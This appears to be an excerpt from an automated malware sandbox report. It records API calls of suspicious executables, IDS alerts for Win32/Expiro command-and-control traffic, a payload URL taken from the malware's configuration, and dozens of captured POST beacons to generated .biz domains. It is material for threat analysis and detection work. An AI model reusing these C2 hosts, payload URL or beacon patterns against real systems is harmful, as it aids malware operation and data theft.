Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 7_2_00EF4EC1
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose, 7_2_00F03E66
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 7_2_00EE532E
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 15_2_00EF589A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 15_2_00EF0207
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 15_2_00EF4EC1
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose, 15_2_00F03E66
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 15_2_00EE532E
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Code function: 4x nop then jmp 02337394h 14_2_02337099
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Code function: 4x nop then jmp 023378DCh 14_2_0233767B
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 14_2_02337E60
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 14_2_02337E5E
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 14_2_02337FBC

Networking

Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:49753 -> 54.244.188.177:80
Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:55012 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:52903 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:54094 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:54498 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:55974 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:49867 -> 82.112.184.197:80
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:50012 -> 18.141.10.107:80
Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:64255 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:50077 -> 18.246.231.120:80
Source: Malware configuration extractor URLs: https://gxe0.com/yak2/233_Juqmtmyadyy
Source: unknown DNS traffic detected: English language letter frequency does not match the domain names
Source: unknown Network traffic detected: DNS query count 63
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0E4B8 InternetCheckConnectionA, 0_2_02D0E4B8
Source: global traffic TCP traffic: 192.168.2.10:49774 -> 51.195.88.199:587
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49708 -> 198.252.105.91:443
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.10:49744
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.10:49757
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.10:49744
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.10:49757
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.10:49773
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.10:49773
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.10:50017
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.10:50017
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.10:50016
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.10:50018
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.10:50016
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.10:50018
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.10:50029
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.10:50029
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.10:50031
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.10:50031
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.10:50077
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.10:50077
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.10:50015
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.10:50015
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.10:50078
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.10:50086
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.10:50086
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.10:50078
Source: global traffic TCP traffic: 192.168.2.10:49774 -> 51.195.88.199:587
Source: global traffic HTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /omhtttbpfwdopn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: POST /ulvxycyjutwdmypq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nkbiquv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: POST /eupqxdgegqjrgdpv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /irvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: POST /s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xwcotmorefmmtc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: POST /kgrfegimyutt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: POST /rvwdmrjan HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mbuec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: POST /avc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qmpy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: POST /blhkiobysomvisx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /aatpwqmmnwrfjm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hrkmkab HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /tkvpxcpexicoa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /bmgwtyy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ghffopumxhoiq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /bgr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /fafj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /dadmwtnbmefxvi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /wofnqkoxvbvigg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ccx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /nbnssijhjwmugla HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hpkejgwwxdp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /pnckkgdjorsjoiow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dhyyqtllpdwr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /btnkoeanfymxsstk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pgakntaoep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ihrtfcsj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ywao HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hdfj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /udjkgjnyfcxmpggx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lhiqwpom HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /opshcknhcx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cmdgaowb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ijfjro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /dvsybtnikly HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kqhlsuvr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /emkvqhipcuidqkmd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mqrfuyvbhtbn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /wt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
